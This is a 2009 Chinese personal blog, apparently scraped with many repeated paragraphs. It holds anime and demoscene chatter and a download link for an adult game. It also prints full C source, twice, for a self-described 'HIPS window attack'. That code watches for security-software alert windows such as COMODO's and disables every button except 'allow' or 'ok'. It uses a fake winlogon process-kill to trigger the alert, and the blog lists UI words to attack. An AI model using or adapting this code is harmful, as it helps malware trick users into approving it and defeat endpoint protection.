Princess Party ~プリンセスパーティー~
在经历了数次被宣传视频(nico:sm6136228)洗脑后,今天终于成功入手了Princess Party,只可惜是日文版的,玩不懂...
还是让它先跟狭小硬盘空间里静静的躺一段时间好了~
宣传视频其二:ze5665466
ブランド CIRCUS
ジャンル アドベンチャー
発売日 ◆初回限定版 2009年3月27日
対応OS Windows 2000/XP/Vista 日本語版
メディア DVD-ROM
JAN ◆初回限定版
4540295001383
定価 ◆初回限定版
7,140円(税込)/6,800円(税抜)
対象年齢 18歳未満購入禁止
CIRCUS/2009年3月27日/7140円
下载地址:
Part1:http://anime.hloli.net/share?down=4f4eed8522efad4e
Part2:http://anime.hloli.net/share?down=cbd732ab35ce2c7b
2009年3月31日 星期二
青春禁止~!恋愛禁止!告白禁止!偶然禁止!絶対禁止!何が何でも禁止~!
2009年3月23日 星期一
从一开始就白忙活了 T_T (window attack) ...
代码还是发出来好了(对于细心的人来说,这些代码并不是一点用也没有的)...
我从一开始就白忙活了,原以为已经很周全了的,可是被一个Esc全给我阻止了 T_T
当然,如果你和我一样是个COMODO用户的话,遇到这个代码也就只能认命了~
由于内心刚刚经历了如下过程,现在我得修养生息去了...
Heuristic manual HIPS window attack (defective)
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
2009年3月21日 星期六
低级启发式Window Attack
虽然我有说直接放代码来着,可是等到真正完成的时候却有点不想放...
反正这也是人之常情嘛~
我就还是先发bin好啦~
曾经使用过的黑名单
WordsToAttack[]=
{
"规则","rule","许可","polic","阻止","block","结束","kill","end"
,"terminate","选项","option","设置","setting","配置","config",
"profile","模式","mode","关闭","close","退出","exit","取消",
"cancel","作为","treat"," as","隔离","isolate"
}
佯攻代码如下:
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
WindowAttack.7z(通行证:wye)
2009-3-22 第一次更新
暂时先不发代码果然是正确的决定呢~
更新内容简述一下~
1.降低代码攻击性,解决了SetParent法造成的COMODO出错退出的问题
2.增加了对手动HIPS的检测结果的显示
这回应该就没什么问题了吧~了吧~
2009-3-22 夜
代码更新,将黑名单法改为白名单法
问题越来越简单化了~
之前的一些小聪明也越来越没用了 - -
代码也越来越和平化、弱智化了...........
...
...
哎~
既然问题都变得如此好解决了,那我就吧代码稍微整理一下贴出来好了。
切,真不爽!
-----------宅人的分割线------------
Lucky Star追完了,彻底被 柊つかさ 给治愈了~
再度展开追逐~
食灵-零
反正这也是人之常情嘛~
我就还是先发bin好啦~
曾经使用过的黑名单
WordsToAttack[]=
{
"规则","rule","许可","polic","阻止","block","结束","kill","end"
,"terminate","选项","option","设置","setting","配置","config",
"profile","模式","mode","关闭","close","退出","exit","取消",
"cancel","作为","treat"," as","隔离","isolate"
}
佯攻代码如下:
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
WindowAttack.7z(通行证:wye)
2009-3-22 第一次更新
暂时先不发代码果然是正确的决定呢~
更新内容简述一下~
1.降低代码攻击性,解决了SetParent法造成的COMODO出错退出的问题
2.增加了对手动HIPS的检测结果的显示
这回应该就没什么问题了吧~了吧~
2009-3-22 夜
代码更新,将黑名单法改为白名单法
问题越来越简单化了~
之前的一些小聪明也越来越没用了 - -
代码也越来越和平化、弱智化了...........
...
...
哎~
既然问题都变得如此好解决了,那我就吧代码稍微整理一下贴出来好了。
切,真不爽!
-----------宅人的分割线------------
Lucky Star追完了,彻底被 柊つかさ 给治愈了~
再度展开追逐~
食灵-零
2009年3月15日 星期日
低级启发式逆推 HIPS (待续)
实验终止,发现之前的思路存在极大的错误(把HIPS与用户交互的进程搞挂了,后台的服务进程还是在发挥着作用)。
新的思路已经诞生,但由于最近从微软手里搜刮到了一个导出了4个非常非常非常友爱的函数的DLL...
我已经没有心情与精力再来针对新的思路搞太多的测试了。过一段时间后直接放代码...
新的思路已经诞生,但由于最近从微软手里搜刮到了一个导出了4个非常非常非常友爱的函数的DLL...
我已经没有心情与精力再来针对新的思路搞太多的测试了。过一段时间后直接放代码...
2009年3月13日 星期五
CLANNAD AS最终话
看完之后的第一想法就是:汐的属性值已经完全超过凉宫春日了么?
(把旧的世界破坏,重新构造出新的小镇)
本来都已经充分做好泪目的心理准备的说...
结果最后被风子给逗笑了...
说是最终话,结果还是和上部一样依然见到预告了...
语无伦次了...
啊!语无伦次了...
语无伦次了...
------AS记录完毕------
主要是对最近新出的那些后宫类动画有些审美疲劳了...
对于新番貌似没有几个感兴趣的...
对那个伪娘与百合的故事又不太热衷..
本来想着AS一完,就开始追 凉宫春日的忧郁 来着,但是没想到我仅用了两个晚上就给追完了...
不过,新的追逐已经开始,就决定是你了!Lucky Star!
(把旧的世界破坏,重新构造出新的小镇)
本来都已经充分做好泪目的心理准备的说...
结果最后被风子给逗笑了...
说是最终话,结果还是和上部一样依然见到预告了...
语无伦次了...
啊!语无伦次了...
语无伦次了...
------AS记录完毕------
主要是对最近新出的那些后宫类动画有些审美疲劳了...
对于新番貌似没有几个感兴趣的...
对那个伪娘与百合的故事又不太热衷..
本来想着AS一完,就开始追 凉宫春日的忧郁 来着,但是没想到我仅用了两个晚上就给追完了...
不过,新的追逐已经开始,就决定是你了!Lucky Star!
2009年3月7日 星期六
关于(About)
借着与鸟交换连接,简单说明一下好了。
此blog新建不久,并且仍处于建设状态,为本人前一段时间更换blog之产物..
--------起源、意义--------
原blog的访问量之中,同学与网友的访问次数可以说各占一半。
但由于共同兴趣的极大差异,经常会出现 同学/网友 完全看不懂blog内容尴尬。
本是想通过详细的文章分类来缓解这一尴尬的.
但谁叫我比较懒呢...
再加上有些真相还是有必要隐藏的...
于是此blog与wye的另一碎块儿便应运而生。
而此处碎块的内容儿则主要是本人宅生活的记录。
至此,此blog也便成为了另大多数人难以理解的存在。
--------本人--------
在这里仅介绍与此blog相关的部分好了。
计算机:对各方面都很感兴趣,尤其对编程、Demoscene、安全相关,很感兴趣,但均处于菜鸟阶段。
ACG:
首先说,本人性别为男!并且无BL向、伪娘向!
本人虽然很宅,但是对于ACG方面还是涉足未深,开始下载动画看也不过是一年前的事情。
如果以在家时间来衡量宅度的话,我可以算是究极。
但是如果以对ACG的了解程度来衡量的话,我还没入门。(前几天才刚刚知道 東方 的存在)
就说这些好了。
--
扯点别的,发现一个很奇异的现象:
在我宣布换blog之后,次日旧blog的日访问量便翻了一倍,并稳定持续到现在...
而我的两个新blog的访问量怎么就是比不上呢?
这是为什么呢?
此blog新建不久,并且仍处于建设状态,为本人前一段时间更换blog之产物..
--------起源、意义--------
原blog的访问量之中,同学与网友的访问次数可以说各占一半。
但由于共同兴趣的极大差异,经常会出现 同学/网友 完全看不懂blog内容尴尬。
本是想通过详细的文章分类来缓解这一尴尬的.
但谁叫我比较懒呢...
再加上有些真相还是有必要隐藏的...
于是此blog与wye的另一碎块儿便应运而生。
而此处碎块的内容儿则主要是本人宅生活的记录。
至此,此blog也便成为了另大多数人难以理解的存在。
--------本人--------
在这里仅介绍与此blog相关的部分好了。
计算机:对各方面都很感兴趣,尤其对编程、Demoscene、安全相关,很感兴趣,但均处于菜鸟阶段。
ACG:
首先说,本人性别为男!并且无BL向、伪娘向!
本人虽然很宅,但是对于ACG方面还是涉足未深,开始下载动画看也不过是一年前的事情。
如果以在家时间来衡量宅度的话,我可以算是究极。
但是如果以对ACG的了解程度来衡量的话,我还没入门。(前几天才刚刚知道 東方 的存在)
就说这些好了。
--
扯点别的,发现一个很奇异的现象:
在我宣布换blog之后,次日旧blog的日访问量便翻了一倍,并稳定持续到现在...
而我的两个新blog的访问量怎么就是比不上呢?
这是为什么呢?
2009年3月2日 星期一
Breakpoint 2009
最近成天发ACG...
虽说我只是个架空的马甲而已...
偶尔也Nerd一下好了...
今年的invitation在出现的当天我就给下载了...
但无奈,"Your display adapter has only 2 multitexturing units,and 4 is needed"
原以为家里这台古董看invitation还是勉强能应付过去的说。
没辙,下高清MP4好了。
同时注意到了一点,这回的data目录没有压缩/加密!
嗯~不错!
高清MP4看了看,清晰度太高,古董仍然受不了,mplayer播放时A-V同步不能...
很勉强的看了一遍,总的来说,比起今年的Every Thing is Under Control,还是更喜欢去年的DIGITAL Garden,去年的invitation的音乐真的很赞!
不过,invitation还是不能说明什么实质性的内容的。
还是相信今年的参赛团队们一定可以产生更多的经典的~
( 虽然我看不到... -_____,- )
啊啊啊啊啊!
通过这两天的洗脑,我俨然被麦当劳叔叔与二小姐给共同侵蚀了...
蓝蓝路~!
虽说我只是个架空的马甲而已...
偶尔也Nerd一下好了...
今年的invitation在出现的当天我就给下载了...
但无奈,"Your display adapter has only 2 multitexturing units,and 4 is needed"
原以为家里这台古董看invitation还是勉强能应付过去的说。
没辙,下高清MP4好了。
同时注意到了一点,这回的data目录没有压缩/加密!
嗯~不错!
高清MP4看了看,清晰度太高,古董仍然受不了,mplayer播放时A-V同步不能...
很勉强的看了一遍,总的来说,比起今年的Every Thing is Under Control,还是更喜欢去年的DIGITAL Garden,去年的invitation的音乐真的很赞!
不过,invitation还是不能说明什么实质性的内容的。
还是相信今年的参赛团队们一定可以产生更多的经典的~
( 虽然我看不到... -_____,- )
啊啊啊啊啊!
通过这两天的洗脑,我俨然被麦当劳叔叔与二小姐给共同侵蚀了...
蓝蓝路~!
訂閱:
文章 (Atom)